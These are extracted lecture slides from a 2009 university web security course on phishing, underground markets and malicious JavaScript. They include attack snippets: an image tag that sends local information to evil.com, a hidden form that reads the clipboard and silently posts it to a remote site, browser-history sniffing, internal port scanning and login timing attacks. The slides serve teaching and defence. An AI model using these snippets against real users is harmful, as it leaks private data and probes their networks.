CS 142 Winter 2009

Phishing and
Malicious JavaScript

John Mitchell
Outline
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
Trends
Most prevalent attacts
(2006)

Cross-site scripting (XSS) – 22%

 Bad web site uses bad page to attack good
site
SQL Injection – 14 %
 Malicious form input to web server
PHP Includes – 10%
Buffer overflow – 8%

2005 was the first year that

XSS jumped ahead of
buffer overflows …
 Updated trends (mid-
2008)

http://www-935.ibm.com/services/us/iss/xforce/midyearreport/xforce-midyear-
report-2008.pdf
Web security: two sides
Web browser: (client side)
 Attacks target browser security
weaknesses
 Result in:
 Malware installation (keyloggers, bot-nets)
 Document theft from corporate network
 Loss of private data

Web application code: (server

side)
 Runs at web site: banks, e-merchants,
blogs
 Written in PHP, ASP, JSP, Ruby, …
 Many potential bugs: XSS, XSRF, SQL
injection
Online Identity Theft
Password phishing
 Forged email and fake web sites steal passwords
Password theft
 Criminals break into servers and steal password files
Spyware
 Keyloggers steal passwords, product activation
codes, etc.
Botnets
 Networks of compromised end-user machines spread
SPAM, launch attacks, collect and share stolen
information
Magnitude
 $$$ billions in direct loss per year
 Significant indirect loss
 Loss of confidence in online transactions
Phishing Attack

Sends email: “There is a

problem with your eBuy
account”

passwor
Password d? User clicks on email
sent to bad link to www.ebuj.com.
guy

User thinks it is ebuy.com, enters

eBuy username and password.
100,000 victims of MySpace
Attack
Spear-Phishing
Targeted email to customers of specific bank
 Higher success rate
 Lower detection rate - beat current filtering
techniques

How to get email accounts for site customers ?

 Most sites have “Forgot my password” pages

 Leaks whether an email is valid or not at that site

We’ll return to this later!
•Spam service
•Rent-a-bot
•Cash-out
•Pump and dump
•Botnet rental
Underground commerce
Market in access to bots
 Botherd: Collects and manages bots
 Access to proxies (“peas”) sold to spammers, often
with commercial-looking web interface
Sample botnet rates
 Non-exclusive access:10¢ per machine. Exclusive
access: 25¢.
 Payment via compromised account (eg PayPal) or
cash to dropbox
Identity Theft
 Keystroke logging
 Complete identities available for $25 - $200+
 Rates depend on financial situation of compromised
person
 Include all info from PC files, plus all websites of interest
with
passwords/account info used by PC owner
Ruslan Ibragimov/send-
safe.com
Ruslan Ibragimov – ROKSO
Record
Seen a message like this
recently?
Pump-and-dump using phished or
keylogged brokerage accounts

October 2006
 E-Trade lost $18M in 3 months,
 TD Ameritrade lost $4M
December 2006
 Evgeny Gashichev, Estonia
 SEC froze assets of his co., Grand Logistic, on Dec 19,
2006
 Used 25 stolen accounts to manipulate US financial
markets
 Made $353,609 in 6 weeks
January 2007
 Aleksey Kamardin, 21, Florida
 Used stolen accounts to pump up value of 17 penny
stocks
 Etrade,
Slide: David Jevans Scottrade, TD Ameritrade, JPMorgan Chase, C.
Outline
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
HTML Image Tags
<html>
…
<p> … </p>
…
<img src=“http://example.com/sunset.gif”
height="50" width="100">
…
</html>

Displays this nice

picture  Security
issues?
Image tag security issues
Communicate with other sites
– <img src=“http://evil.com/pass-local-
information.jpg?extra_information”>
Hide resulting image
– <img src=“ … ” height=“1"
width=“1">
Spoof other sites
– Add logos that fool a user

Very Important Point: A web page can send information to

any site
Accessing local state
Read clipboard contents
<html>
<p> Test script to read clipboard contents. </p>
<script>
var content = clipboardData.getData("Text");   
alert("Clipboard contents = " + content)
</script>
</html>

This probably does not work in your current browser – try it!
 Stealing clipboard contents
Create hidden form, enter clipboard text, post
form
<FORM name="hf" METHOD=POST ACTION=
"http://www.site.com/targetpage.php" style="display:none">   
<INPUT TYPE="text" NAME="topicID">   
<INPUT TYPE="submit">
</FORM>
<script language="javascript">   
var content = clipboardData.getData("Text");   
document.forms["hf"].elements["topicID"].value = content;   
document.forms["hf"].submit();
</script>
User browsing history?

Which parts of the CS258 web site did I visit recently?

Reading user history
JavaScript can read style
properties
var node = document.createElement("a");
a.href = url;
var color =
getComputedStyle(node,null).getPropertyValue("color");
if (color == "rgb(0, 0, 255)") { … }

CSS :visited style property

<style>a:visited
{background: url(track.php?bank.com);}
</style>
<a href="http://bank.com/">Hi</a>
Can be used for good or evil
Report user risks back to bank
 Bank can test whether customer has
visited any known phishing site, warn
her
Context aware phishing

 Email recipient sees logo, msg of own

bank
Port scanning behind firewall
JavaScript can:
 Request images from internal IP addresses
 Example: <img src=“192.168.0.4:8080”/>
 Use timeout/onError to determine success/failure
 Fingerprint webapps using known image names

Server 1) “show me dancing pigs!” scan

Malicious
2) “check this out”
Web page
scan

3) port scan results Browser

scan

Firewall
Rendering and events

Basic execution model

 Each browser window or frame
 Loads content
 Renders
 Processes HTML and scripts to display page
 May involve images, subframes, etc.
 Responds to events

Events can be
 User actions: OnClick, OnMouseover
 Rendering: OnLoad, OnBeforeUnload
 Timing: setTimeout(), clearTimeout()
JavaScript onError
Basic function
 Triggered when error occurs loading a
document or an image
Example
<img src="image.gif"
onerror="alert('The image could not be loaded.')“
>
 Runs onError handler if image does not exist and
cannot load

http://www.w3schools.com/jsref/jsref_onError.asp
JavaScript timing
Sample code
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById(’test’);
var start = new Date();
test.onerror = function() {
var end = new Date();
alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>

 When response header indicates that page is not an

image, the browser stops and notifies JavaScript via the
onerror handler.
Spear-Phishing
Targeted email to customers of specific bank
 Higher success rate
 Lower detection rate - beat current filtering
techniques

How to get email accounts for site customers ?

 Most sites have “Forgot my password” pages

 Leaks whether an email is valid or not at that site

Direct Timing
Time a login attempt
The response time of
the server depends on
whether the email
address used is valid or
not

This problem affects

every tested web site!
Cross-Site Timing Attack
Hijack a user’s browser session to time sites
 Timing depends on the user’s relationship with the target
site
 Can distinguish logged in from not
 Remote scripting
Goal
 Exchange data between a client-side app running in a
browser and server-side app, w/o reloading page
Methods
 Java Applet/ActiveX control/Flash
 Can make HTTP requests and interact with client-side
JavaScript code, but requires LiveConnect (not available on all
browsers)
 XML-RPC
 open, standards-based technology that requires XML-RPC
libraries on server and in your client-side code.
 Simple HTTP via a hidden IFRAME
 IFRAME with a script on your web server (or database of static HTML
files) is by far the easiest of the three remote scripting options

See: http://developer.apple.com/internet/webcontent/iframe.html
Frame and iFrame
Window may contain frames from different
sources
 Frame: rigid division as part of frameset
 iFrame: floating inline frame
iFrame
<IFRAME example
SRC="hello.html" WIDTH=450 HEIGHT=100>
If you can see this, your browser doesn't understand IFRAME.
</IFRAME>

Why use frames?

 Delegate screen area to content from another source
 Browser provides isolation based on frames
 Parent may work even if frame is broken
 Simple remote scripting
example
client.html: RPC by passing arguments to server.html in query string
<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>

server.html: another page on same server, could be server.php, etc

<script type="text/javascript">
window.parent.handleResponse()
</script>

RPC can be done silently in JavaScript, passing and receiving argumen

Conclusion
Phishing and online identity theft
 Deception through web technology
 Underground economy – what thieves are after
Mischief and deception
 Accessing local state
 Reading the clipboard (now mitigated)
 Accessing browser history
 Customizing display based on state
 Chameleon pages (for good and evil)
 Context-aware phishing
 Probing the network
 Port scanning, with and without JavaScript
 Timing attacks on login pages
 Communicating back to the server
 Query parameters
 Persistent bidirectional communication
Reading
Phishing and online identity theft
 Required: pages 8-12 on types of phishing attacks
 Recommended: skim pages 13-44 on defenses
Port scanning
 Read the short web page
History tracking
 Required: sections 1, 2.2, 4 (link tracking)
 Recommended: rest of section 2, section 3 (cache
tracking)
 Optional: rest of paper
Timing attacks
 Required: sections 1, 3, 5
 Recommended: section 4 (cross-site timing)
 Optional: rest of paper